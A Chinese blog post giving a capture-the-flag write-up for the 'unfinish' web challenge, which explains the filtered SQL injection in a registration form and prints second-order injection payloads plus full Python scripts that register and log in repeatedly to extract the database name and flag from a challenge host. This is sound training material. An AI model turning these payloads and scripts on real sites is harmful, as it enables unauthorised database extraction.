攻防世界-web-unfinish-从0到1的解题历程writeup

最新推荐文章于 2024-05-18 17:12:14 发布
最新推荐文章于 2024-05-18 17:12:14 发布
阅读量5.5k 收藏 5
点赞数 3
分类专栏: CTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41429081/article/details/105600568
版权

题目分析

题目描述为:SQL

题目主要功能界面分析:

主要分为注册、登陆、以及成功登陆后的一个界面。

通过描述可以知道题目应该存在SQL注入漏洞。

图片

扫描得知注册界面存在SQL注入漏洞

尝试构造sql盲注语句如下

{'username': "1' and ELT(left((SELECT schema_name FROM information_schema.schemata limit 0,1),1)='d',SLEEP(5)) or '1'='1", 'password': 'admin', 'email': 'eamil@eamil.com'}

得到结果为

图片

即存在过滤

测试发现过滤了逗号、information

那么使用盲注应该不太行了,但是username这边的内容是可以执行,所以我们将username的值拼接上查找出来的内容,利用登陆后会显示用户名做到一个二次注入的效果。

解题流程

首先可知注册的sql语句应该为

insert into tables values('$email','$username','$password')

我们通过控制post的参数

构造sql语句为:

insert into tables values('admin1@admin.com','0'+ascii(substr((select database()) from 1 for 1))+'0','admin')

即插入的username即拼接上了我们要查找的

查数据库脚本如下

import requests
import time
from bs4 import BeautifulSoup       #html解析器

def getDatabase():
    database = ''
    for i in range(10):
        data_database = {
            'username':"0'+ascii(substr((select database()) from "+str(i+1)+" for 1))+'0",
            'password':'admin',
            "email":"admin11@admin.com"+str(i)
        }
        #注册
        requests.post("http://159.138.137.79:52974/register.php",data_database)
        login_data={
            'password':'admin',
            "email":"admin11@admin.com"+str(i)
        }
        response=requests.post("http://159.138.137.79:52974/login.php",login_data)
        html=response.text                  #返回的页面
        soup=BeautifulSoup(html,'html.parser')
        getUsername=soup.find_all('span')[0]#获取用户名
        username=getUsername.text
        if int(username)==0:
            break
        database+=chr(int(username))
    return database

print(getDatabase())

得到数据库名为web

然后尝试获取表名失败,因为过滤了information

看了评论说表名全靠猜哈哈

图片

还是给上一个获取flag的脚本

脚本中途获取表名失败了,被我注释了~~emmm

import requests
import time
from bs4 import BeautifulSoup       #html解析器

def getDatabase():
    database = ''
    for i in range(10):
        data_database = {
            'username':"0'+ascii(substr((select database()) from "+str(i+1)+" for 1))+'0",
            'password':'admin',
            "email":"admin11@admin.com"+str(i)
        }
        #注册
        requests.post("http://159.138.137.79:52974/register.php",data_database)
        login_data={
            'password':'admin',
            "email":"admin11@admin.com"+str(i)
        }
        response=requests.post("http://159.138.137.79:52974/login.php",login_data)
        html=response.text                  #返回的页面
        soup=BeautifulSoup(html,'html.parser')
        getUsername=soup.find_all('span')[0]#获取用户名
        username=getUsername.text
        if int(username)==0:
            break
        database+=chr(int(username))
    return database

print(getDatabase())


def getTables():
    tables = ''
    for i in range(10):
        data_tables = {
            'username':"0'+ascii(substr((select tables()) from "+str(i+1)+" for 1))+'0",
            'password':'admin',
            "email":"admin12@admin.com"+str(i)
        }
        #注册
        requests.post("http://159.138.137.79:52974/register.php",data_tables)
        login_data={
            'password':'admin',
            "email":"admin12@admin.com"+str(i)
        }
        response=requests.post("http://159.138.137.79:52974/login.php",login_data)
        html=response.text                  #返回的页面
        soup=BeautifulSoup(html,'html.parser')
        getUsername=soup.find_all('span')[0]#获取用户名
        username=getUsername.text
        if int(username)==0:
            break
        tables+=chr(int(username))
    return tables
'''
print(getTables())
'''

def getFlag():
    flag = ''
    for i in range(40):
        data_flag = {
            'username':"0'+ascii(substr((select * from flag) from "+str(i+1)+" for 1))+'0",
            'password':'admin',
            "email":"admin32@admin.com"+str(i)
        }
        #注册
        requests.post("http://159.138.137.79:52974/register.php",data_flag)
        login_data={
            'password':'admin',
            "email":"admin32@admin.com"+str(i)
        }
        response=requests.post("http://159.138.137.79:52974/login.php",login_data)
        html=response.text                  #返回的页面
        soup=BeautifulSoup(html,'html.parser')
        getUsername=soup.find_all('span')[0]#获取用户名
        username=getUsername.text
        if int(username)==0:
            break
        flag+=chr(int(username))
    return flag

print(getFlag())

图片

CTF小白
关注
  • 3
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
攻防世界web进阶区unfinish
gongjingege的博客
08-12 549
题目描述:SQL 题目链接有三个,登录,注册,主页 可以看出这道题考察sql注入 打开靶机链接,看到一个登陆界面 有登录就可能有注册,url栏register.php 先注册一个 注册成功后跳转到主页,同时在主页显示用户名 唔,鬼刀里的冰公主,品味不错,俺喜欢︿( ̄︶ ̄)︿ 先试着在注册界面手注吧 构造插入的注册语句 payload:insert into tables values(‘email′,′0′+ascii(substr((selectdatabase())from1for1))+′0′,
攻防世界 web高手进阶区 6分题(ics-07、unfinish、i-got-id-200)
闵行小鱼塘
08-02 839
继续ctf的旅程,攻防世界web高手进阶区的6分题:ics-07、unfinish、i-got-id-200
[网鼎杯 2018]unfinish.md
09-05
[网鼎杯 2018]unfinish.md
CTF show----web 解题笔记(web签到~web6)
最新发布
baimao__Ch的博客
05-18 964
从时代发展的角度看,网络安全的知识是学不完的,而且以后要学的会更多,同学们要摆正心态,既然选择入门网络安全,就不能仅仅只是入门程度而已,能力越强机会才越多。因为入门学习阶段知识点比较杂,所以我讲得比较笼统,大家如果有不懂的地方可以找我咨询,我保证知无不言言无不尽,需要相关资料也可以找我要,我的网盘里一大堆资料都在吃灰呢。干货主要有:①1000+CTF历届题库(主流和经典的应该都有了)②CTF技术文档(最全中文版)③项目源码(四五十个有趣且经典的练手项目及源码)
攻防世界----unfinish
qq_44418229的博客
08-02 610
攻防世界--unfinish SQL的二次注入
攻防世界web进阶区之unfinish
qq_45756971的博客
08-08 458
题目:进入所给链接,发现是一个登陆界面 我们进入注册界面题目为二次注入,参照大佬给出的代码,修改注册url和登录url即可跑出flag import requests import time from bs4 import BeautifulSoup #html解析器 def getDatabase(): database = '' for i in range(10): data_database = { 'username':"0'+
[CTF 真题] 2018-网鼎杯-Web-Unfinish
weixin_43586169的博客
07-22 1115
首先进行一个扫描,发现注册与登陆页面,通过观察发现可能存在二次注入,尝试注册一个带有SQL语句的账号,然后登陆这个账号查看显示用户名的地方是否进行了执行,返回的是否是数据库中的数据。通过脚本批量注册,然后进行登陆,最后获得Flag。...
Part_CAE_Unfinish.rar
06-15
《UG在有限元分析中的应用初探》 在现代工程设计中,有限元分析(Finite Element Analysis,简称FEA)是一种广泛使用的数值方法,用于解决各种...通过不断地学习和实践,相信每个初学者都能在有限元的世界中游刃有余。
微信小程序 setData 对 data数据影响问题
10-17
即使我们从缓存中获取 `cloneitem`,由于 `setData` 的同步特性,改变 `uniqueitem` 依然会影响到 `cloneitem`。 这种现象的原因在于 JavaScript 的赋值行为。当使用 `=` 运算符赋值时,如果赋值的是一对象(如数组...
攻防世界-web-i-got-id-200-从0到1的解题历程writeup
CTF小白的博客
04-17 2828
题目分析 主要的功能界面就两个 提交姓名年龄界面 文件上传界面 首先可以知道这是一个perl语言的后台 漏洞扫描了一下除了xss漏洞还有这个目录穿越漏洞 直接猜出flag文件 常规做法可以 /cgi-bin/file.pl?/bin/bash%20-c%20ls${IFS}/| 看了大佬的解释为 通过管道的方式,执行任意命令,然后将其输出结果用管道传输到读入流中,这样就可以保证获取到fla...
视频教程-零基础Linux命令详细案例讲解课程(第1季)--重定向和命令展开-Linux
weixin_28336665的博客
05-28 156
零基础Linux命令详细案例讲解课程(第1季)--重定向和命令展开 十年IT...
BugKu:0和1的故事(writeup)
哇哈爱吃糖的博客
07-25 1万+
题目附件包含一个文本文件,内容如下: 0000000001110010000000000 0000000000011110100000000 0000000001110001000000000 0000000010111100000000000 0000000010101010000000000 0000000001100010100000000 0000000010101010100000000 0000000001000001100000000 1100011101110110100011000 000
攻防世界web
热门推荐
kid的博客
05-23 2万+
攻防世界web 前言 准备ctf比赛,这里把攻防世界分值低于5分的基本刷了一遍(分值再高刷不动了…) 练习 view_source 没难度知识禁用了右键点击,ctrl+u查看源码拿到flag get_post 这题没什么好说的,按着提示来就能拿flag 但我发现下面的hackbar不能用后用burp来进行post传参不返回flag…迷了我很久… 结果我下了左边那个hackbar后重来一...
攻防世界的web(一)
weixin_43342135的博客
08-18 374
一.view_source 打开网页之后,f12查看网页的源代码,得到flag: 二.get_post 打开网页之后,网页提示我们进行get传值 在网页之后添加get完值之后,得到了提示: 之后再用hackbar进行post传值: 三、robots robots协议: robots.txt文件是一个文本文件,使用任何一个常见的文本编辑器, 比如Windows系统自带的Notepad,就可以创...
[网鼎杯2018]Unfinish
fightte的博客
05-24 809
[网鼎杯2018]Unfinish 熟悉的二次注入: 是sql注入题目: 常见的目录规则,让人想起register.php,扫描目录也扫出来了: 注册: 登录进去,搜寻信息: 用户名被显示出来,试试二次注入:
攻防世界web1~5题
qq_63011209的博客
11-11 235
一.view_source 本题考查获取网页源代码
攻防世界web进阶区unfinish详解
hxhxhxhxx的博客
08-09 3981
攻防世界web进阶区unfinish详解题目详解 题目 详解 我们使用御剑,扫描一波 我们进入注册页面查看,发现这个,有注册的话猜一下二次注入(这里注入,然后去页面看结果) 我们先拿AWVS试试, 哦~我的上帝,它存在注入 我们试试,burp的fuzz看看他过滤了什么 还是过滤了蛮多的 这些是都没过滤的 既然知道了他是sql注入 那么我们为啥不用sqlmap呢 我们使用sqlmap,发现只能知道这里有注入点,但是过滤很严重 我们需要找找合适的tamper 哦~我的上帝,果然不行,看来还得看看师
攻防世界web题目53 xss1
hulitong的博客
10-13 589
这是一个xss的漏洞,首先注册一个账号找到投稿–>发表评论或文章的地方,我们要构造一个xss代码获取cookie,然后利用cookie来登录后台管理 利用xss平台
攻防世界Web:unfinish
Light_inthe_eyes的博客
10-20 294
打开页面后,是一个登录页面: 用御剑扫一扫,发现有注册页面: 用burpsuite抓注册页面: 尝试构造sql盲注语句:username=1' and left(database(),1)>'a'# 得到结果为nnnnoooo!!!过滤了很多 通过抓包出来的三个参数,猜测注册的语句是:insert into tables value('$email','$username','$passwpord'); 登录成功后语句:SELECT * FROM tables WHERE email = ''$em
攻防世界 web高手进阶区 10分题 xss1
闵行小鱼塘
11-10 703
继续ctf的旅程,开始攻防世界web高手进阶区的10分题,本文是xss1的writeup

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值